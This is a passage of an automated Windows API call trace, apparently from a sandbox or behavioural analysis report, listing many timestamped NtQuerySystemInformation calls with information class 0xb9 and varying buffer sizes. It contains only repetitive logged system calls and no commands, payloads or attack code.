ResultLength=0x0) [0229.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0229.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0229.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0229.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0229.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0229.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x28, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0229.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0229.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0229.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x20, ResultLength=0x0) [0229.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0229.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x20, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x20, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x20, ResultLength=0x0) [0229.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x28, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce00, Length=0x20, ResultLength=0x0) [0229.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x28, ResultLength=0x0) [0229.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce00, Length=0x20, ResultLength=0x0) [0229.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd7e0, Length=0x28, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x20, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x20, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd550, Length=0x20, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd550, Length=0x20, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x20, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x20, ResultLength=0x0) [0229.300] 